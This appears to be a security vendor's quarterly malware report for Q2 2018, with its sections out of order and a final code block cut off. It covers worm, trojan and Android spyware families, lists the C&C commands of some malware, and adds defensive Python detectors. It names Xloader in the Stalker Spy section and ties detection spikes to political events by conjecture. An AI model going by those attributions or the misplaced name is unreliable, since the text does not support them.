This timeline shows that Russia had the most persistent Packer problems, while Iran had the highest periodic spikes.
5.3.3 Email Flooder
Email Flooders are malware used to overwhelm email servers with messages in order to "kill" or shut them down, in a form of denial-of-service (DoS) attack.
The one Email Flooder that Comodo detected in Q2 2018 was Palevo, which Microsoft describes as able to spread not only via email but also by copying itself to removable drives and network folders.
The primary country where Comodo detected this malicious behavior was Germany.
And this timeline shows that while the number of Palevo detections was not high, it was still a persistent threat in Germany.
5.3.4 Virtual Tools
Virtual Tools are programs that can modify or alter malicious files to avoid detection.
The top Virtual Tools that Comodo detected in Q2 2018 were Patcher, AntiAV and RunFile.
The top two countries for Virtual Tools detections were Germany and the US.
This timeline shows that Germany had one particularly heavy infestation around the beginning of June, while the US had two sharp spikes, one at the start and the other at the end of Q2 2018.
5.3.5 Jokes
"Joke" malware is in fact just what it says: these are non-malicious applications which claim to take a malicious action when in fact they are only intended as humor, or simply to annoy the user for a brief period of time.
Such malware is typically only labeled a "Medium" threat because the hacker's intention is not to damage or destroy information but merely to have fun at the victim's expense.
Germany (de) and the US were the top two countries of detection for Joke malware.
In this timeline you can see that this malware type is not numerous - but still something to be aware of.
5.4 Low Threat Malware: Applications
In this section we will cover a range of malicious functionality that Comodo detected within Applications, Unwanted Applications and Unsafe Applications.
5.4.1 Applications
Malicious or merely suspicious applications are dangerous because users often download and use such software on purpose. However, Comodo detects and flags such applications as malicious because they exhibit behavior of which users may be unaware, including extreme efforts to track user behavior and location.
In Q2 2018 the most common such application was Elex. Despite the fact that Microsoft has labeled Elex only as a "Potentially Unwanted Application" or PUA, this software is nasty and attempts to install files that run at startup, add drivers, inject processes, alter browser behavior and modify DNS settings.
The bubble chart above shows that the US and Mexico were the most common countries in which Comodo detected these types of Applications.
And finally, this timeline shows that, far from being a rare occurrence, such malicious software is endemic, especially in North America.
5.4.2 Unwanted Applications
The unwanted application malware category is alarming in that, during the course of common computer and Internet activity, users often inadvertently install these Applications. For example, they include common adware programs, widely disseminated images, videos, dialers, jokes, gossip and more.
The most common unwanted application that Comodo detected this quarter was DealPly, which Microsoft describes as "poor reputation" software that tries to install additional bundled software, modify the user homepage, modify the search provider and/or perform other actions users might not have intended. They include free toolbars, adware and "system optimizers".
As you can see in the bubble chart, the US is far and away the most common country of detection for unwanted applications in Q2 2018.
And as this timeline shows, this malware type poses not only a large but also a daily challenge to network security in the US.
5.4.3 Unsafe Applications
Unsafe applications are seemingly legitimate programs that are in fact frequently leveraged by coders and hackers with malicious intent. Often they claim to help users with administrative or security functionality but in fact do the opposite; they include fake anti-virus and free Internet Relay Chat (IRC) clients.
The most common unsafe application that Comodo detected in Q2 2018 was AutoKMS, software that can be used to "crack" or patch unregistered copies of Microsoft software. These are referred to as "hacktools" and may be distributed with additional malware that users can install inadvertently.
This malware type is a bit different in that, while the US is currently the most common country of detection, Ukraine (ua) and Russia (ru) are #2 and #3 respectively.
This timeline shows that the US - and to a lesser extent Ukraine - have a steady problem with Unsafe Applications, while Russia experienced one major spike in Q2 2018.
6 Vertical analysis
In this section let's examine unique malware profiles that Comodo identified within specific "verticals" or economic sectors. The infographic details unique malware distributions for twenty-two vertical markets or industries, from automotive to travel, covering four dangerous malware types: Backdoors, Trojans, Viruses and Worms. Further, the diagram lists the #1 malware family for each Vertical's top malware type.
Let's take a closer look at two trojans, Kryptik and Zbot, that were the top detected not only in one but within multiple verticals, clearly making them a current strategic threat across the world.
First, Kryptik: the New Jersey Cybersecurity & Communications Integration Cell reported that Kryptik was first created to obtain information about an infected host's FTP servers but now has the ability to target email clients, file browsers and file managers. CNET Magazine wrote that Kryptik has been used as a trojan "Clicker" to boost the hit-count of websites and has spread through downloads of Microsoft Silverlight and Adobe Flash. Fortinet noted that in December 2015 Kryptik was found on the networks of Ukrainian power companies during a major cyberattack on that country. Comodo discovered a large outbreak of Kryptik in the US state of Virginia just prior to its gubernatorial election in 2017.
Second, let's examine "Zbot", which is another name for the "Zeus" Trojan, undermining Microsoft Windows security since 2007. One of its first uses was to target the United States Department of Transportation, and over a decade later Zbot is still the top Trojan in the government and transportation verticals. Today the Zeus botnet may be the largest on the Internet, with millions of compromised machines around the world.
Zeus has often been used to steal financial information, such as account numbers and passwords, via keystroke logging and online form grabbing. It has also been used to install ransomware, including CryptoLocker. Zbot is often spread through drive-by downloads and email phishing attacks, sometimes supported by a social engineering scheme that falsely claims that a target's computer already has a Virus and needs to be cleaned.
In conclusion: first, trojans are dangerous malware that can be found within every vertical and can be used for a wide variety of cyberattacks. Second, strategic analysis like this can be used to create unique malware profiles for each vertical and provide valuable cyber intelligence that clarifies primary malware threats and better focuses limited time and resources against them.
7 Geopolitical Intelligence
7.1 USA
This timeline displays a range of the most dangerous malware types detected within the United States in Spring 2018. Clearly, the major spike on March 13 stands out in this data. What happened on this day in the US, and what might help to explain the surge in malware activity? On that day US President Donald Trump announced the names of his new Secretary of State, Mike Pompeo, and new CIA Director, Gina Haspel. In that light, one likely reason for this dramatic rise in malware detections is that intelligence agencies from around the world suddenly received a raft of new intelligence collection requirements, comprising many requests for information related to upcoming changes in US political, military and intelligence activities, after which these agencies immediately began to fulfill these requirements via computer hacking - commonly called cyber espionage - which today takes place on a far greater scale than the public realizes.
7.2 China
This chart illustrates Comodo's aggregated malware detections in China for Q2 2018. Clearly, June 4 stands out as the single most prominent day. The reason for this massive spike is that many intelligence services - both foreign and domestic - were likely busy trying to protect and/or collect sensitive information relating to current events within China. Why on June 4? That is the anniversary of the 1989 Tiananmen Square protests.
7.3 South Korea
National security events always attract the attention of professional hackers, who seek to collect the kind of information that serves as the basis for intelligence reporting. This graph shows Comodo trojan horse malware detections in South Korea during Q2 2018. The highest single spikes took place simultaneously with annual joint US-South Korean military exercises. This fact should come as little surprise in the Internet age, when everyone from students to soldiers, spies and statesmen does most of their work online: students collect data for academic papers, spies collect data for intelligence reports.
7.4 North Korea
The chart above shows Comodo malware detections in North Korea during Q2 2018. At the beginning of May Comodo saw a spike consisting of well over ten times the usual number of detections. One plausible explanation for this activity is that someone, or some institution, was either briefly more connected to the Internet than usual or was trying to take advantage of this short period of political openness to better connect with the outside world. Comodo did further research on the detected malware and identified it as Windows activation or "cracking" software and Chinese-made anti-censorship programs.
7.5 Armenia
All major geopolitical events today are bathed in malware. The reason is that all activities - from social activities to business, politics or national security affairs - are mostly performed online. This is especially true during times of national crisis, as both government and citizens are in overdrive trying to gather new information - or trying to prevent others from doing the same. Ample evidence is provided by this timeline, which shows that Armenia's 2018 political revolution was accompanied by Comodo's largest detection of malware within that country during Q2 2018.
7.6 Belarus
A common hacker refrain is that "information wants to be free". Evidence for this argument is provided by this timeline, which shows Comodo's Virus and Trojan detections in Belarus in Q2 2018. On June 14, as the government in Minsk passed new legislation with a view toward controlling the spread of "fake news", Comodo detected a massive spike in both viruses and trojans. It is possible that the virus outbreak was specifically used to disseminate trojan horses, which were then leveraged for some real-world purpose: either to gather, deny or manipulate sensitive information related to the new legislation and its impact on Belarusian society.
7.7 Iraq
Today there is possibly no hotter topic in information security than election hacking. In this chart showing Comodo malware detections in Iraq in Q2 2018, two clear spikes stand out that we must consider. Both might be associated with recent electoral incidents. In mid-April Iraq was preparing for a national election, which included a conundrum on how best to secure its electronic dimension. And at the beginning of July Iraq was preparing for a vote recount following accusations of impropriety at the polls.
7.8 Ukraine
Sometimes it is hard to know the reason for a specific spike in malware detection - and sometimes there may be multiple reasons. In this timeline of Comodo malware detections in Ukraine in Q2 2018, there may have been multiple reasons for the highest spike, on May 24. Both of the cited news stories are from May 23: the first discusses Ukraine's Independence Day as well as Ukraine's testing of new military weapons provided by the US government; the second describes a cyberattack that Ukraine feared would target a major sporting event, the Champions League final in Ukraine's capital city, Kyiv, on May 26.
7.9 Croatia
Since the cyberattack that targeted Estonia in 2007, it is clear that cyberattacks can be used to punish not only individuals and enterprises but also entire nations. In that context, this massive spike in malware detection in Croatia on March 28 is interesting, as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an "act of hostility".
7.10 Finland, Russia, USA
Finally, let's have a look at Comodo's virus detections in Finland during Q2 2018. The largest single spike - by far - occurred on the day when the press began to report that Donald Trump and Vladimir Putin would have a summit in the Finnish capital of Helsinki. Geolocation of this Virus activity in Finland revealed that it almost exclusively took place in Helsinki's suburb of Vantaa - precisely where the summit was scheduled to take place.
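Every country section above reads a spike off a detection timeline by eye. As an added example for this edition (not Comodo's code or data), the Python script below does the same mechanically on a constructed 30-day series of daily detection counts, using a median/MAD robust z-score so that the spikes themselves cannot inflate the baseline they are measured against. The sample counts, the 5.0 threshold and the 1.4826 scaling constant are assumptions made for the illustration.

```python
"""Spike detection for a daily malware-detection series (added example, not Comodo's code).

A day is flagged when its count lies far above the series median, measured in
units of the median absolute deviation (MAD). Median and MAD are used instead
of mean and standard deviation because the spikes we are looking for would
otherwise inflate the baseline and hide themselves.
"""
from datetime import date, timedelta
from statistics import median
from typing import Dict, List, Tuple

# Constructed 30-day series for June 2018 (illustrative, not Comodo's figures):
# a quiet baseline near 50 with one sharp spike and one smaller one.
_COUNTS = [48, 52, 45, 50, 55, 47, 51, 49, 53, 46, 50, 54, 610, 52, 48,
           51, 47, 130, 50, 49, 53, 46, 52, 48, 50, 55, 47, 51, 49, 52]
SAMPLE_SERIES: Dict[date, int] = {
    date(2018, 6, 1) + timedelta(days=i): c for i, c in enumerate(_COUNTS)
}


def robust_zscores(counts: List[int]) -> List[float]:
    """Robust z-score per element: (x - median) / (1.4826 * MAD)."""
    med = median(counts)
    mad = median([abs(c - med) for c in counts])
    scale = 1.4826 * mad  # 1.4826 makes the MAD comparable to sigma for normal data
    if scale == 0:
        scale = 1.0  # flat series: any deviation is already the whole signal
    return [(c - med) / scale for c in counts]


def find_spikes(series: Dict[date, int], threshold: float = 5.0) -> List[Tuple[date, int, float]]:
    """Return (day, count, z) for the days whose robust z-score reaches the threshold."""
    days = sorted(series)
    scores = robust_zscores([series[d] for d in days])
    return [(d, series[d], round(z, 2)) for d, z in zip(days, scores) if z >= threshold]


if __name__ == "__main__":
    for day, count, z in find_spikes(SAMPLE_SERIES):
        print(f"{day.isoformat()}: {count} detections (robust z = {z})")
```

On the sample series the median is 50 and the MAD is 2, so the 610-count day scores roughly 189 and the 130-count day roughly 27; an ordinary noisy day such as 55 scores under 2 and is not reported. Attributing a flagged day to an event, as the sections above do, is a separate analytical step that the statistic does not perform.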
8 Conclusions
In Q2 Comodo Cybersecurity observed several new, significant trends likely to radically influence the cybersecurity marketplace and IT end users. These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios.
The fact that trojan malware increased in the last quarter means that the spread of malware in general will be amplified soon. Trojans are a covert weapon, and the cybersecurity industry should assume that many trojan-based attacks that occurred in Q2 remain undetected, with the real impact of these attacks being revealed in quarters to come. Another meaningful fact is that trojans serve as a delivery vector for other types of malware. Combined, these facts point to a huge surge in the infection of hosts worldwide with a diversity of malware samples.
Our findings show that malware is becoming more cunning in its delivery methods, more sophisticated in persistence and much harder for antivirus software to detect. The propagation of fileless malware, the evolution of cryptominers and the use of legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication.
Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems, presaging new attacks and mobile malware development. As more people use their mobile devices for financial transactions (via banking and e-payment apps) and store confidential information (like messenger correspondence and private pictures), cybercriminals can anticipate rich pickings from exploiting those devices. With successful penetration, perpetrators profit by stealing money, selling confidential information or blackmailing victims.
Moreover, given that the majority of detected trojans in Q2 were information stealers, we can see another dangerous tendency: the accelerating bias of cybercriminals toward hunting for confidential data.
Combined, these trends promise a heavy impact on the cybersecurity marketplace and on IT end users in the future, creating changes in the cybersecurity landscape and forcing IT security departments to update their security measures and probably revamp their security strategy, policies and postures.
REQUEST A DEMO
Try Comodo Cybersecurity by speaking with a security consultant to begin the process to set up a demo or proof-of-concept project. Contact us directly at +1 888-266-6361.
© 2018 ALL RIGHTS RESERVED. COMODO SECURITY SOLUTIONS INC.
VISIT COMODO.COM
NORTH AMERICA: Comodo Security Solutions Inc, 1255 Broad Street, Clifton, NJ 07013, United States. Tel +1 (888) 551 1531, Tel +1 (888) 266 6361, Int +1 (703) 581 6361, Fax +1 (973) 777 4394, sales@comodo.com
EUROPE: Comodo Security Solutions Inc, Șoseaua Națională 31, Iași 700237, Romania. Europe +40 332 806 772
ASIA: Comodo Security Solutions Pvt Ltd, Prestige Office Centre, 183 NSK Salai, Vadapalani, Chennai, India. Tel +91 44 4562 2800, www.comodo.co.in
Comodo Threat Research Labs monitors, filters and analyzes malware, ransomware, viruses and other "unknown" potentially dangerous files 24/7/365 in over 190 countries around the world. With 5 offices spread across the Americas, Asia and Europe (and staff covering over 190 countries), the Lab is made up of more than 220 IT security professionals, ethical hackers, computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing millions of potential pieces of malware, phishing, spam or other malicious/unwanted files and emails every day.
The Lab also works with trusted partners in academia, government and industry to gain additional insights into known and potential threats. CTRL's mission is to use the best combination of cybersecurity technology and innovations, machine learning-powered analytics, artificial intelligence and human experts and insights to secure and protect Comodo Cybersecurity customers, business and public-sector partners and the public community.
About Comodo Cybersecurity
Comodo Cybersecurity is a global innovator of cybersecurity solutions, protecting critical information across the digital landscape. Building on its unique position as the world's largest certificate authority, Comodo Cybersecurity authenticates, validates and secures networks and infrastructures, from individuals to mid-sized companies to the world's largest enterprises. Comodo Cybersecurity provides complete end-to-end security solutions across the boundary, internal network and endpoint, with innovative technologies solving the most advanced malware threats, both known and unknown. With global headquarters in Clifton, New Jersey, and branch offices in Silicon Valley, Comodo Cybersecurity has international offices in China, India, the Philippines, Romania, Turkey, Ukraine and the United Kingdom. For more information visit comodo.com. Comodo Cybersecurity and The Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc or its affiliates in the US and other countries. Other names may be trademarks of their respective owners. The current list of Comodo Cybersecurity trademarks and patents is available at comodo.com/repository.
After infection, Xloader connects to its C&C server and executes the following commands:
- Extract the device information
- Delete SMS
- Set ringer mode
- Monitor incoming SMS messages
- Clear memory
- Check for the presence of the following banking applications: com.wooribank.pib.smart, com.kbstar.kbbank, com.ibk.neobanking, com.sc.danb.scbankapp, com.shinhan.sbanking, com.hanabank.ebk.channel.android.hananbank, nh.smart, com.epost.psf.sdsi, com.kftc.kjbsmb, com.smg.spbs
- Extract contact details
- Set Wi-Fi always turned on
Version 2 can execute additional commands:
- Send SMS and read outgoing SMS
- Enable and disable a Wi-Fi connection
- Access a location specified by attackers
- Make recordings
- Make calls
4.1.5 Stalker Spy
The next malware in the row is Stalker Spy. As you can see, it is a champion in the number of masks it puts on to deceive users.
Disguises of Stalker Spy (app names as they appear in the screenshot): FlexiSpy, MBackup, HelloSpy, ProActivator, TActivator, Setting, Wi-Fi Settings, ردیاب اسپای ھاید, Keylogger, System Service, Mobile Spy, 随意代挂, Subway Surfers, 라이브성인방송, Мобильный антивирус, droidgetlogevent, SmartcardService, Cheats Z, CloudAgent, New Insta Follow, Android CJ 대한통운 택배, 余生代挂APP, Basic Daydreams, SystemWifiService, Samplecom, мобильный клиент, Asa刷钻
In addition to the usual must-have spyware set, Xloader can remotely turn on the microphone of the infected device to make recordings. This malware is used in three known applications: FlexiSpy, HelloSpy, MobiSpy.
4.1.6 Mystery Bot
The next malware is much more than a spy. The first version of Mystery Bot combines spyware that steals information with a banking trojan that connects to the C&C server of the Locky bot. The second version of Mystery Bot is ransomware that encrypts files on external storage; after encryption the malware deletes the original files. So we can call it a spy with a "007 license".
Disguises of Mystery Bot: Version 1 - Adobe Flash Player; Version 2 - Flash Player.
Mystery Bot comes under cover of Adobe Flash Player. Below is a list of some of the commands that the malware can execute on an infected device:
- Send_SMS - extract SMS content and send it to the C&C server
- Send_USSD - send the USSD to the C&C server
- Gethistory - monitor browser history
- Start_AllApp - gather information about installed applications
- Send_call - set the Intent action to call
- Forward_call - forward incoming calls
- ResForward_call - reset call forwarding
- Go_Smsmnd - delete SMS content
- Go_GetAlls - get SMS history
- Dell_sms - delete SMS content in a conversation
- Send_spam - send spam SMS
- Start_Inject - call the injectors class
4.1.7 FakeSpy
FakeSpy also has many masks, as you can see in the screenshot.
Disguises of FakeSpy (from the screenshot): 佐川急便, 현대캐피탈
It collects available information from the infected device and sends it to the C&C servers. It also checks for the presence of the following banking applications: aucomapp, softbankcomapp, docomocomapp.
Here are some commands from its Command and Control server:
- contacts - get contact details and email id
- Mute - set action to mute
- Mms - get MMS content
- info - get device information
4.1.8 RedAlert
RedAlert changes multiple "spy legends" to gain users' trust. It wears the masks of popular applications to deceive its victims: Update Flash Player, Viber, WhatsApp, Update WhatsApp, Ebook Reader.
Disguises of RedAlert: Version 1 - EbookReader, Update Flash Player, Android Update WhatsApp, Viber; Version 2 - Update Google Market, Flash Player, Tactic FlashLight.
RedAlert is spread via online hacking forums. Its distinguishing feature is the ability to block incoming calls from banks. It canvasses the device in search of the following bank applications:
- de.postbank.finanzassistent
- pl.mbank
- aib.ibank.android
The second version can block access to some websites, including Google Chrome, Google Play store, Gmail and YouTube.
4.1.9 Hero Rat
The next digital spook, Hero Rat, mostly operates in Iran. It uses third-party app stores, social networks and messengers for spreading.
Disguises of Hero Rat (version 1, from the screenshot): CloudVPN, MyIrancel, Mtproto, زیـــــبانـــــویس تلگرام ھمھ کاره, Proxy, دوست یاب, Telegram Ton, شارژ رایگان بگیر, App Master, Anti Rat, PlatformA, فالورگیر نامحدود, اینترنت رایگان
Its code is available on a Telegram hacking channel. Notably, it is sold in three tiers: bronze, silver and gold.
After infiltrating a victim's device, Hero Rat shows a warning such as "app can't be run", but it keeps running in the background and starts its spying activity. It steals text messages and audio recordings, makes calls, detects the device location, and so on. The newly infected device is controlled via Telegram bot functionality.
Hero Rat disguises itself as Bitcoin, Free Internet Connection, Get free Followers, and Telegram versions for the Iranian market.
4.1.10 Sonvpay
The next malware, Sonvpay, also wears many masks, but it is more of a fraudster than a spy.
Disguises of Sonvpay (version 1, from the screenshot): Caculator-2018, Despacito Ringtone, CaroGame2018, Wifi-Hostpot, Reccoder-Call, QRCodeBar Scanner APK, Let me love you ringtone, Iphone Ringtone, Night light, Beauty camera-Photo editor, Shape of you ringtone
Sonvpay covertly subscribes infected devices to WAP and SMS services to add extra charges to the owner's mobile bill. Once installed, the malware displays a fake notification with a "skip option"; if the user clicks this button, the malware begins to work in the background, subscribing the user to services she did not order.
It comes to victims in the variety of disguises shown above.
4.1.11 CoinHive
The last one in our Q2 Android malware list is CoinHive. We already mentioned it earlier in the report; here is the version for Android devices. CoinHive for Android comes in three versions, each of which upgrades its mining potential. It is disseminated via the counterfeit apps shown below, but one of the vectors is especially interesting.
Disguises of CoinHive: Version 1 - Netflix Hack, Instagram Hack; Version 2 - TSF Launcher; Version 3 - Android Service, PlacarTv Futebol Ao Vivo.
The malware is covertly propagated via... another cryptominer, named CoinMiner.
How is this possible? Let's imagine a cybercriminal who wants to infect victims with a cryptominer to use their resources for cryptocurrency mining. She chooses CoinMiner for that purpose, downloads it and implants it into the victims' machines. However, she is not aware that earlier another cybercriminal infected CoinMiner with CoinHive. So the first attacker is a victim too: thief robbing thief.
This story clearly illustrates the situation in cybersecurity in Q2: no one can feel totally secure. Even a predator can turn prey in seconds.
4.2 Android Malware Catalogued by Month
Below you will find detailed statistics on Android-targeted malware by month.
4.2.1 April 2018
Chart: Android-targeted malware in April
4.2.2 May 2018
Chart: Android-targeted malware in May
4.2.3 June 2018
Chart: Android-targeted malware in June
5 Malware in Q2 2018: The Big Picture
Above is a visualization of the malware activity that Comodo detected in Q2 2018. The graphic covers over 400 million unique malware detections across 237 countries' top-level domains (ccTLDs). This report tries to disentangle this web of malicious activity and understand each malware type individually, as well as its impact around the world.
5.1 Strategic Threat: Computer Worms
A computer worm is like a virus but typically travels autonomously, exploiting vulnerabilities in network defenses as it spreads across the Internet. A worm is usually designed as a vehicle that delivers a malicious payload to a victim computer or network. However, even worms without a payload can consume enormous bandwidth, diminish network or local system resources and possibly cause a denial of service. For this Q2 2018 Report we place Worms in a special category called "Strategic Threat" due to their ability to travel very quickly across the Internet and compromise many computers at once.
5.1.1 Generic Worms
This section shows the world's most common computer worm detections, covering generic worm-like activity that is not tied to a specific propagation vector.
Brontok, which has been plaguing our planet for over a decade, ranked as the top computer Worm, followed by Conficker, Nimda and over 300 more.
The bubble chart shows that in Q2 2018 Russia (ru), Turkey (tr) and India (in) were the countries with the highest number of Worm infections.
And finally, this timeline shows that the sharpest worm outbreaks occurred in Turkey (mid-April) and India (mid-May), with Russian worm detections spread more evenly throughout Q2 2018.
5.1.2 Net Worms
A "Net Worm" typically infects network shares (such as a remote hard drive or server), from which it can infect every computer that accesses it from a local area network (LAN) or company intranet.
In Q2 2018 Allaple was the most common Net Worm detected; Microsoft describes it as a "multi-threaded polymorphic" worm that can perform denial-of-service (DoS) attacks against websites.
The bubble chart above shows that Germany (de) and France (fr) were the most common countries of Net Worm detection in Q2.
The timeline above shows that Poland, Germany and Armenia experienced the sharpest Net Worm outbreaks in Q2, and that French detections were spread more evenly throughout the quarter.
5.1.3 Email Worms
Email worms are nasty in that they can travel between victim computers, for example via computer exploits and autorun functionality.
This quarter the most common Email Worm, by far, was Runonce.
The top four countries for Email Worm detection were Russia (ru), Germany (de), South Africa (za) and Brazil (br).
This timeline shows the primary Email Worm outbreaks during Q2 2018, with Russia experiencing rather frequent Email Worm challenges, Germany having the deepest concentration at the beginning of June, and Poland the sharpest spike toward the end of Q2.
5.1.4 p2p Worms
A peer-to-peer (p2p) network consists of interconnected nodes (or "peers") that share resources without the use of a centralized administrative system. Such networks are commonly employed to share files such as unauthorized copies of books and films, and hackers take advantage of this dynamic to disseminate malware.
Polip was the most common p2p Worm in Q2 2018. Microsoft describes Polip as a "memory resident" virus that infects ".exe" and ".scr" files and may leverage the Gnutella p2p network protocol to distribute copies of itself.
The bubble chart above clearly shows Russia as the primary home of p2p Worms in Q2 2018.
And this timeline shows that Russia did not suffer from just one p2p Worm outbreak, but many.
5.1.5 IM Worms
Did you know that social media accounts can be used to spread malware? One special type of computer worm, known as an "IM" or instant messaging worm, can be used to send malicious links via sites such as Facebook, either manually or automatically.
During Q2 2018 most of the IM Worms that Comodo detected were in Iran, as illustrated in the bubble chart below.
This particular IM Worm was a variant of a famous IM Worm called Yahos, which led to the arrest of 10 people in 2012 by the FBI for spreading banking malware via social networks with the Yahos IM Worm.
This timeline shows that while Comodo did not detect many IM Worms, they were nonetheless detected throughout Q2 2018 in various corners of the globe, mostly in developing countries.
5.2 High Threat Malware
In this section we cover four high-threat malware types: Backdoors, Viruses, Trojans and Exploits. In contrast to Worms, these malware types can be considered a more localized threat, as they typically require some level of user interaction for propagation and installation. However, once they are installed on a system or network, they can be devastating to personal or enterprise security.
5.2.1 Backdoors
A backdoor is a hidden way to bypass normal user authentication, often leveraged to gain covert remote access to a computer system, cryptosystem or algorithm. A backdoor can be an installed program or a modification to an existing legitimate program.
The most common Backdoor that Comodo detected in Q2 2018 was Dark Komet (or Comet), a remote access trojan (RAT) that is fully 10 years old. This malware allows a hacker to control a compromised system with the aid of a Graphical User Interface (GUI) and can be used for almost any purpose, including various kinds of cyber espionage.
The United Kingdom ("gb" for Great Britain) was home to an astonishingly high proportion of Comodo's Backdoor detections in Q2.
The UK's Backdoor challenges are also apparent in this timeline. Expect a closer analysis of this British Backdoor epidemic at Black Hat 2018.
5.2.2 Viruses
A computer virus is self-replicating code that "infects" other computer programs and devices by corrupting them in malicious ways that can facilitate data theft, spam dissemination, data destruction and more. A virus usually cannot be transferred to another computer unless a user moves the infected file or performs some action, such as opening an attachment or clicking on a hyperlink.
Ramnit was the top Virus for Q2 2018. Microsoft describes Ramnit as a "severe" virus that infects Windows executable files (EXE) and HTML files (HTML) and spreads through infected removable drives such as USB flash drives.
The bubble chart above shows that Ukraine (ua) and Russia (ru) were the most common countries of detection for viruses, but also that many other countries were affected, especially developing countries.
This timeline shows that Ukraine experienced two significant Virus spikes, in mid-April and mid-May.
5.2.3 Trojans
Trojans take their name from the famous wooden horse of Greek mythology, due to malicious functionality that is hidden within seemingly useful or benign computer programs. Typically, Trojans grant remote attackers the same rights and privileges as a local user and can be used for many different kinds of cyberattack, including the installation and execution of ransomware.
In Q2 2018 Starter was the most common trojan, infecting systems in well over 100 countries. Microsoft reports that Starter creates an unauthorized user account on a victim system and adds the account to the administrator group as a "Remote Service Account".
The bubble chart shows that Germany (de) was the #1 country for Trojans according to Comodo detections.
And this timeline shows when this huge Trojan infestation took place: in the beginning of June 2018.
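A defender-side check for the behaviour the report attributes to Starter (a new account that is promptly added to the administrators group), as an added example that is not part of the report: it correlates Windows Security events 4720 (account created) and 4732 (member added to a local group) over constructed, simplified log lines. The line format and the ten-minute window are assumptions.

```python
"""Correlate Windows Security events for the pattern the report attributes to
the Starter trojan: a freshly created local account that is then added to the
Administrators group. Added example, not from the Comodo report. The log lines
are constructed and simplified to "timestamp|event_id|field=value;..." (not the
real EVTX layout); 4720 (user account created) and 4732 (member added to a
security-enabled local group) are genuine Windows Security event IDs."""
from datetime import datetime, timedelta

# Constructed sample: one suspicious sequence (RemoteSvc, created and elevated
# two seconds later by SYSTEM), a normal help-desk onboarding (jdoe, RDP users),
# an existing admin re-added (itadmin, no 4720), and a service account elevated
# twelve hours after creation (svc_backup, outside the default window).
SAMPLE_LOG = """\
2018-06-02T03:14:07|4720|TargetUserName=RemoteSvc;SubjectUserName=SYSTEM
2018-06-02T03:14:09|4732|MemberName=WS01\\RemoteSvc;TargetUserName=Administrators;SubjectUserName=SYSTEM
2018-06-02T09:30:00|4720|TargetUserName=jdoe;SubjectUserName=helpdesk
2018-06-02T09:31:12|4732|MemberName=WS01\\jdoe;TargetUserName=Remote Desktop Users;SubjectUserName=helpdesk
2018-06-03T11:00:00|4732|MemberName=WS01\\itadmin;TargetUserName=Administrators;SubjectUserName=helpdesk
2018-06-04T08:00:00|4720|TargetUserName=svc_backup;SubjectUserName=helpdesk
2018-06-04T20:00:00|4732|MemberName=WS01\\svc_backup;TargetUserName=Administrators;SubjectUserName=helpdesk
"""

PRIVILEGED_GROUPS = {"administrators"}   # extend with environment-specific admin groups


def parse_event(line):
    """Split one constructed log line into a dict with parsed time and event id."""
    ts, eid, fields = line.split("|", 2)
    attrs = dict(kv.split("=", 1) for kv in fields.split(";") if kv)
    return {"time": datetime.fromisoformat(ts), "id": int(eid), **attrs}


def account_of(member_name):
    """Return the bare account name from a 4732 MemberName such as HOST\\user."""
    return member_name.rsplit("\\", 1)[-1].lower()


def find_new_admin_accounts(log_text, window=timedelta(minutes=10)):
    """Return one alert per account that was created (4720) and added to a
    privileged group (4732) within `window`. Additions of accounts with no
    creation event in the log, additions to non-privileged groups and late
    elevations are ignored; tune `window` to the environment."""
    events = [parse_event(l) for l in log_text.splitlines() if l.strip()]
    events.sort(key=lambda e: e["time"])     # the log may not be in order
    created = {}                              # account -> creation time
    alerts = []
    for ev in events:
        if ev["id"] == 4720:
            created[ev["TargetUserName"].lower()] = ev["time"]
        elif ev["id"] == 4732 and ev["TargetUserName"].lower() in PRIVILEGED_GROUPS:
            acct = account_of(ev["MemberName"])
            born = created.get(acct)
            if born is not None and timedelta(0) <= ev["time"] - born <= window:
                alerts.append({"account": acct, "group": ev["TargetUserName"],
                               "created": born, "elevated": ev["time"],
                               "by": ev["SubjectUserName"]})
    return alerts


if __name__ == "__main__":
    for a in find_new_admin_accounts(SAMPLE_LOG):
        delay = (a["elevated"] - a["created"]).total_seconds()
        print(f"ALERT {a['account']} -> {a['group']} {delay:.0f}s after creation by {a['by']}")
```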
5.2.4 Exploits
Computer Exploits comprise software, data chunks or sequences of commands that take advantage of pre-existing bugs or vulnerabilities in software to circumvent access controls and potentially damage target computer software or hardware. Exploits can enable unauthorized access, privilege escalation or denial of service (DoS).
The discovery of computer exploits can be rare, as such vulnerabilities are typically patched and fixed quickly once they are discovered.
In Q2 2018 the majority of exploits detected by Comodo focused on a favorite hacker target: Adobe Portable Document Format (PDF) files, which were created in the 1990s to present documents in a common format independent of application software, hardware and operating systems.
Japan and India were the two countries where Comodo detected the majority of Exploit behavior in Q2 2018, with Japan clearly experiencing the most persistent challenges.
5.3 Medium Threat Malware
In this section we focus on five malware types that are somewhat rarer and more exotic: Email Flooders, Constructors, Jokes, Virtual Tools and Malware Packers.
5.3.1 Constructor
Constructors are applications that can be used to automatically create malware files.
For Q2, Alamar was the #1 constructor that Comodo detected. Microsoft describes this program as a "Severe" malware threat to PC users.
In Q2, Germany (de) was the top country of detection for Constructors.
And this timeline shows not only that Germany had a serious problem with Constructors in Q2, but also that this malware is likely a persistent threat to German networks.
5.3.2 Packers
Malware that is "packed" refers to any means used to hide or obfuscate malicious executable code by compressing or "packing" it within larger, seemingly innocuous software and data streams. The hostile code can even come in the form of scripts. The compressed data often contains separate decompression code, or even a self-extracting archive, which is used to recreate the original code from the compressed code and then execute the malware. Encryption may also be used to conceal the malware from security software, as another means to obfuscate the attack.
MUPX, or the Modified "Ultimate Packer for Executables", dominated this part of the malware landscape. MUPX is free open source software that is compatible with numerous file formats and different operating systems and leverages an open source data compression algorithm, UCL, that is just a few hundred bytes of code in length.
In Q2 2018 Russia was the #1 home to malware Packers.
This timeline shows that Russia had the most persistent Packer problems, while Iran had the highest periodic spikes.
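As an added example (not Comodo's code and not part of the UPX project), a small PE section-table parser that flags the two signs a packer leaves behind: stock UPX section names, and the empty-plus-high-entropy section layout that survives when a modified build renames them. The PE images it inspects are constructed in memory, and the entropy threshold is an assumption.

```python
"""Spot Windows executables that look packed with UPX or a modified UPX (the
MUPX family named in the report). Added example, not Comodo's code or UPX's.
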